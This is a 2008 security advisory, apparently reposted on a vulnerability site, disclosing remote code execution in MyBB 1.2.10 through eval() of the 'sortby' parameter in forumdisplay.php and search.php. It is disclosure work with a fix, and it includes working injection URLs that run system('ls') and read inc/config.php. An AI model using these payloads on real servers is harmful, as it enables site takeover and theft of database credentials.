Remote Code Execution in MyBB 1.2.10

2008.01.22
Credit: waraxe
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10 ======================================================================== ======= Author: Janek Vind "waraxe" Independent discovery: koziolek Date: 16. January 2008 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-61.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ MyBB is a discussion board that has been around for a while; it has evolved from other bulletin boards into the forum package it is today. Therefore, it is a professional and efficient discussion board, developed by an active team of developers. Vulnerabilities discovered ======================================================================== ======= 1. Remote Code Execution in "forumdisplay.php": ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Precondition: valid forum "fid" must be known. Attacker doesn't need to have any privileges in mybb installation to be successful in attack. Proof-Of-Concept request: http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby=' ... and we will see error message: Parse error: syntax error, unexpected ''', expecting ']' in C:\apache_wwwroot\mybb.1.2.10\forumdisplay.php(407) : eval()'d code on line 1 Problematic piece of code is related to "eval()" function: eval("\$orderarrow['$sortby'] = \"". $templates->get("forumdisplay_orderarrow")."\";"); Example attacks: http://localhost/mybb.1.2.10/forumdisplay.php?fid=2 &sortby='];phpinfo();exit;// http://localhost/mybb.1.2.10/forumdisplay.php?fid=2 &sortby='];system('ls');exit;// http://localhost/mybb.1.2.10/forumdisplay.php?fid=2 &sortby='];readfile('inc/config.php');exit;// 2. Remote Code Execution in "search.php": ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Precondition: search "sid" must be known - but that's trivial task. Attacker doesn't need to have any privileges in mybb installation to be successful in attack. http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby=' Parse error: syntax error, unexpected ''', expecting ']' in C:\apache_wwwroot\mybb.1.2.10\search.php(141) : eval()'d code on line 1 Problematic is exactly same piece of code, as in previous case: eval("\$orderarrow['$sortby'] = \"". $templates->get("forumdisplay_orderarrow")."\";"); Example attacks: http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby='];phpinfo();exit;// http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby='];system('ls');exit;// http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here] &sortby='];readfile('inc/config.php');exit;// Both remote code execution security holes are very dangerous and can be used by attacker to complete takeover the website and possible total compromise of webserver. How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Download MyBB new version 1.2.11 as soon as possible! Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb and anyone else who know me! Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~ come2waraxe (at) yahoo (dot) com [email concealed] Janek Vind "waraxe" Homepage: http://www.janekvind.com/ Waraxe forum: http://www.waraxe.us/forums.html ---------------------------------- [ EOF ] ------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top